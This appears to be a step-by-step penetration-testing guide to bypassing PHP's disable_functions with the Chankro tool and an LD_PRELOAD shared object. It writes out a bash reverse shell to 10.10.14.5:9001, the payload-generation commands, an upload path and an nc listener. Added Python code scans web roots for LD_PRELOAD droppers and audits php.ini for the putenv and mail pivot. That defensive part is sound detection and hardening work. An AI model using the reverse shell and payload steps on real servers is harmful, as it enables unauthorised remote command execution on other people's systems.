Sometimes system(), exec(), shell_exec(), and other dangerous PHP functions are disabled through disable_functions. Chankro helps us bypass that restriction by using LD_PRELOAD and a custom shared object.


🧠 Step-by-Step Guide

๐Ÿ” 1. Identify Target Architecture

  • Access the phpinfo.php page on the target.
  • Look for architecture info:
    • Architecture => x86_64 → 64-bit
    • Architecture => i686 or i386 → 32-bit

💣 2. Create Shell Script

Prepare a Bash reverse shell in a file named shell:

echo "bash -c 'exec bash -i >& /dev/tcp/10.10.14.5/9001 0>&1'" > shell

โš™๏ธ 3. Install Chankro

If not installed:

git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help

๐Ÿ› ๏ธ 4. Generate PHP Payload with Chankro

Use this command template:

python2 chankro.py --arch ARCH --input shell --output payload.php --path /var/www/html/<app_folder>

Replace:

  • ARCH → 32 or 64, based on step 1
  • shell → the file containing your payload
  • payload.php → the name of the generated payload file
  • path → the full filesystem path under DOCUMENT_ROOT (shown in phpinfo()) where the payload will be uploaded

✅ Example

python2 chankro.py --arch 64 --input shell --output rev.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db
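From the defender's side, the generated payload has a recognisable shape on disk: a PHP file that writes a shared object and sets LD_PRELOAD through putenv(). The following scanner is an added example written for this page, not code from Chankro; the indicator regexes are the editor's own heuristics (the "f0VMRg" string is simply the base64 encoding of the ELF magic bytes), and the two PHP samples are constructed for an offline run.

```python
import re
from pathlib import Path

# Heuristic indicators of a PHP file that drops a shared object and injects it
# via LD_PRELOAD. Chosen by the editor for detection; they are not signatures
# shipped with Chankro, and the patterns are deliberately loose.
INDICATORS = {
    # putenv("LD_PRELOAD=...") is how PHP code sets the variable for child processes
    "sets_ld_preload": re.compile(r"putenv\s*\(\s*['\"]LD_PRELOAD=", re.I),
    # "f0VMRg" is the base64 encoding of the ELF magic bytes \x7fELF
    "embedded_elf_b64": re.compile(r"f0VMRg"),
    # writing a .so into a writable directory precedes the preload
    "writes_so": re.compile(r"file_put_contents\s*\([^)]*\.so", re.I),
}


def score_php_source(src: str) -> dict:
    """Return which indicators fire on one PHP source text, plus an overall verdict."""
    hits = {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}
    # Setting LD_PRELOAD and carrying an ELF blob in the same file is the strong signal;
    # a lone file_put_contents() or a lone base64 blob is common in legitimate code.
    hits["suspicious"] = hits["sets_ld_preload"] and hits["embedded_elf_b64"]
    return hits


def scan_webroot(root: str) -> list:
    """Walk a document root and return (path, hits) for every suspicious .php file."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        try:
            src = path.read_text(errors="ignore")
        except OSError:
            continue
        hits = score_php_source(src)
        if hits["suspicious"]:
            findings.append((str(path), hits))
    return findings


# Constructed samples (not real payloads): a benign upload handler and a file
# shaped like an LD_PRELOAD dropper, for exercising the scanner offline.
BENIGN_PHP = "<?php $d = base64_decode($_POST['img']); file_put_contents('up.png', $d); ?>"
DROPPER_LIKE_PHP = (
    "<?php file_put_contents('/tmp/h.so', base64_decode('f0VMRgIBAQAAAAAAAAAAAA'));"
    " putenv('LD_PRELOAD=/tmp/h.so'); ?>"
)

if __name__ == "__main__":
    import sys
    # Usage: python3 scan.py /var/www/html   (default path is an assumption)
    for p, h in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "/var/www/html"):
        print(p, [k for k, v in h.items() if v and k != "suspicious"])
```

Run it against the web root after any suspected upload; the benign sample triggers none of the indicators, while the dropper-shaped sample trips all three.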

๐Ÿ–ฅ๏ธ Start Listener on Attacker Machine

nc -lvnp 9001

🧪 Additional Notes

  • Chankro works by abusing the LD_PRELOAD trick when PHP runs under mod_php.
  • Works even when disable_functions, open_basedir, and similar hardening measures are in place.
  • Does not work in environments using PHP-FPM with separate privilege drops.
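The notes above explain why a disable_functions list that only names the exec family is not enough: the LD_PRELOAD trick needs putenv() to set the variable and a function such as mail() that makes PHP spawn a child process which inherits it. The audit below is an added example for this page, not part of Chankro; the function lists were assembled by the editor from how the technique works, the mod_php check follows the page's note that the trick targets mod_php, and the two php.ini fragments are constructed.

```python
import re

# PHP functions on the LD_PRELOAD bypass path: putenv() sets the variable and
# mail() spawns sendmail, a child that inherits it and loads the preloaded
# object. dl() is included because it loads a shared object directly.
# Assembled by the editor from how the technique works; not Chankro's source.
PRELOAD_PIVOT_FUNCTIONS = ("putenv", "mail", "dl")

# The functions an administrator usually blocks first to stop direct command execution.
EXEC_FUNCTIONS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")


def parse_disable_functions(ini_text: str) -> set:
    """Collect the function names listed by disable_functions in php.ini text."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # drop ini comments
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            disabled.update(f.strip().lower() for f in m.group(1).split(",") if f.strip())
    return disabled


def audit(ini_text: str, sapi: str) -> dict:
    """Report what the config leaves open; sapi is the "Server API" value from phpinfo()."""
    disabled = parse_disable_functions(ini_text)
    exec_open = [f for f in EXEC_FUNCTIONS if f not in disabled]
    pivot_open = [f for f in PRELOAD_PIVOT_FUNCTIONS if f not in disabled]
    # The page states the trick works under mod_php (apache2handler) and not under
    # PHP-FPM with privilege separation, so other SAPIs are rated lower risk here.
    preload_path_open = (
        sapi == "apache2handler" and "putenv" not in disabled and "mail" not in disabled
    )
    return {
        "sapi": sapi,
        "exec_functions_open": exec_open,
        "pivot_functions_open": pivot_open,
        "ld_preload_bypass_possible": preload_path_open,
        "recommendation": (
            "add putenv,mail,dl to disable_functions or run PHP under PHP-FPM pools"
            if preload_path_open else "LD_PRELOAD bypass path closed"
        ),
    }


# Constructed php.ini fragments: the common "exec-only" hardening that the page
# says Chankro still defeats, next to a corrected version.
WEAK_INI = """
; blocks direct execution but leaves the environment pivot open
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
open_basedir = /var/www/html
"""

HARDENED_INI = """
disable_functions = system,exec,shell_exec,passthru,popen,proc_open,putenv,mail,dl
open_basedir = /var/www/html
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini, "apache2handler"))
```

Point it at the real php.ini (or the merged output of `php -i`) and the "Server API" line from phpinfo(); a result with an empty exec list but a non-empty pivot list is exactly the configuration this page describes as bypassable.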

🧰 Related Tools

  • PHPGGC – For deserialization-based shell payloads.
  • socat – For more stable reverse shells.
  • LinPEAS – To identify misconfigurations for further exploitation.
  • php-reverse-shell.php – Basic reverse shell (fallback when system() is enabled).